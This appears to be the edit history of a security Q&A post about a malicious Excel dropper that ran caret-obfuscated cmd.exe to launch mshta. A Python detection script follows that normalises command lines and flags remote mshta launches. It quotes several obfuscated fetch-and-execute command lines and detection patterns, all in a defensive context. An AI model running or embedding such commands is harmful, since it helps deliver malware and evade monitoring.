Edited by schroeder (134.3k reputation; 55 gold, 310 silver, 357 bronze badges): deleted 75 characters in body; edited tags; edited title

Inline diff of this revision (old text → new text):

Title: "(HTA language) malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?" → "Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?"

Body: "malicious excel file" → "malicious Excel file"; 'made use of the "^" character' → "made use of the ^ character"

Command lines (unchanged apart from trailing whitespace):

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

Removed from the end of the body: "Thanks," / "QOHEN" / the NOTE explaining that the x's hide the IP address and are not part of the syntax.


Edited text:

Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

I found a malicious Excel file that was using an embedded HTA program as its dropper to download a PowerShell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the ^ character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was:

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the command line? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Original revision:

(HTA language) malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

I found a malicious excel file that was using an embedded HTA program as its dropper to download a PowerShell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the "^" character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was:

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the command line? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Thanks,

QOHEN

NOTE: I used "x's" to hide the IP address... not part of the syntax
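The two sandbox lines in the question show the parser at work: in cmd.exe the caret is the escape character, and outside double quotes the parser consumes it and takes the following character literally, so `m^sh^t^a h^tt^p^:/^/...` is exactly `mshta http://...` by the time the child process is created. Inside double quotes a caret is kept as-is. The consequence for monitoring is that a rule written against the raw command line never sees the string `mshta`, while the de-escaped child command line does contain it. The script below is an added example, not part of the question or of any sandbox output: it normalises command lines the way cmd's parser does, flags carets placed between alphanumerics (escaping a letter has no purpose other than hiding a token), and then applies a simple mshta-with-URL rule to the normalised text. The sample command lines, the rule names and the 192.0.2.10 address are all constructed for the example.

```python
import re

# Constructed sample process-creation command lines for this example (not the
# sandbox output from the post); 192.0.2.10 is a documentation-range placeholder.
SAMPLE_COMMAND_LINES = [
    # caret-obfuscated mshta launch, same shape as the one in the post
    r'C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/192.0.2.10/pp/aa.html',
    # carets inside double quotes are literal; the ones outside still hide "mshta"
    'cmd.exe /c echo "^not an escape^" & m^s^h^t^a http://192.0.2.10/x.hta',
    # plain (un-obfuscated) mshta launch of a remote page
    'cmd.exe /c mshta.exe http://192.0.2.10/plain.html',
    # legitimate caret use: escaping the & metacharacter so echo prints it
    'cmd.exe /c echo hello ^& dir',
]


def uncaret(cmdline: str) -> str:
    """Normalise a cmd.exe command line the way cmd's own parser does:
    outside double quotes '^X' becomes 'X'; inside double quotes the caret is
    kept literally; a trailing lone caret is dropped."""
    out = []
    in_quotes = False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == '^' and not in_quotes:
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])  # keep the escaped character only
                i += 1
        else:
            out.append(ch)
        i += 1
    return ''.join(out)


# A caret between two alphanumerics escapes a character that never needed
# escaping; that only makes sense as obfuscation of a token.
POINTLESS_ESCAPE = re.compile(r'[A-Za-z0-9]\^[A-Za-z0-9]')

# Detection rule meant for the *normalised* line: mshta launched with a URL.
MSHTA_REMOTE = re.compile(r'\bmshta(?:\.exe)?\b.*https?://', re.IGNORECASE)


def analyze(cmdline: str):
    """Return (normalised_line, names_of_rules_that_fired)."""
    normalized = uncaret(cmdline)
    hits = []
    if POINTLESS_ESCAPE.search(cmdline):
        hits.append('caret-obfuscation')
    if MSHTA_REMOTE.search(normalized):
        hits.append('mshta-remote-url')
    return normalized, hits


def rule_hits_raw_only(cmdline: str) -> bool:
    """Whether the mshta rule would fire on the raw, un-normalised line."""
    return MSHTA_REMOTE.search(cmdline) is not None


if __name__ == '__main__':
    for line in SAMPLE_COMMAND_LINES:
        normalized, hits = analyze(line)
        print(f'raw:        {line}')
        print(f'normalised: {normalized}')
        print(f'raw-line rule match: {rule_hits_raw_only(line)}; '
              f'hits after normalising: {hits}\n')
```

Run as-is, the obfuscated line fails the raw mshta rule and passes it after normalisation, while the `echo hello ^& dir` line, a legitimate use of the caret, triggers neither rule. Normalising before matching, plus alerting on the letter-caret-letter pattern itself, is the practical defence: the obfuscation only works against tools that inspect the cmd.exe command line and never see what cmd hands to the child process.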